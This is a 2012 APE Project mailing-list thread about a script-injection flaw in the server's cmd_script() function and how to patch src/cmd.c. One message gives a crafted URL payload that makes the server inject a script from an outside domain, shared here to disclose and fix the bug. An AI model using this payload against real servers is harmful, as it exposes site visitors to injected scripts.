I took a look at the cmd_script() and im no C savy but i dont think that command does what we think it does.
I personally thought it injected javascript directly into the server enviroment but it doesn't looks like it, i have to test it and see. On Dec 12, 2012 11:09 PM, "UTAN" <[email protected]> wrote: > Pablo, > > I don't seem to duplicate it. > > I have put your your hook as follow > Ape.registerHookCmd('script', function(){ > Ape.log('Script was called sussefully'); > //return false; > }); > > and tried to run tru Ape server URL .. and doesn't log anything... > But manage to find the function on that file mentioned above.. > > On Dec 12, 4:58 pm, Pablo Tejada <[email protected]> wrote: > > You would have to patch the file, rebuild the server and replace the > > generated aped file with the one in your installation. > > > > Before digging into the source can you verify if the hook i mentioned > above > > fixes this bug? > > On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote: > > > > > > > > > > > > > > > > > Indeed , thanks for point it out Pablo.. > > > Now what should i just edit and patch and the file and then reload Ape > > > or I have to reinstall all over? > > > > > On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote: > > > > He did mentioned src/cmd.c > > > > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote: > > > > > > > Have you released any patch, if you made some workaround what file > > > > > should we patch? > > > > > > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote: > > > > > > I managed recently with an issue that allows to inject any js > script > > > by > > > > > > preparing link like: > > > > > > http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}] > > > > > > > > It allows either attach script from your url or inject script > > > directly > > > > > such > > > > > > as in this example. > > > > > > > > The solution for this issue is to filter both params domain and > > > scripts > > > > > in > > > > > > file src/cmd.c (function: cmd_script()) in ape server. > > > > > > > -- > > > > > You received this message because you are subscribed to the Google > > > > > Groups "APE Project" group. > > > > > To post to this group, send email to [email protected] > > > > > To unsubscribe from this group, send email to > > > > > [email protected] > > > > > For more options, visit this group at > > > > >http://groups.google.com/group/ape-project?hl=en > > > > > --- > > > > > APE Project (Ajax Push Engine) > > > > > Official website :http://www.ape-project.org/ > > > > > Git Hub :http://github.com/APE-Project/ > > > > > -- > > > You received this message because you are subscribed to the Google > > > Groups "APE Project" group. > > > To post to this group, send email to [email protected] > > > To unsubscribe from this group, send email to > > > [email protected] > > > For more options, visit this group at > > >http://groups.google.com/group/ape-project?hl=en > > > --- > > > APE Project (Ajax Push Engine) > > > Official website :http://www.ape-project.org/ > > > Git Hub :http://github.com/APE-Project/ > > -- > You received this message because you are subscribed to the Google > Groups "APE Project" group. > To post to this group, send email to [email protected] > To unsubscribe from this group, send email to > [email protected] > For more options, visit this group at > http://groups.google.com/group/ape-project?hl=en > --- > APE Project (Ajax Push Engine) > Official website : http://www.ape-project.org/ > Git Hub : http://github.com/APE-Project/ > -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
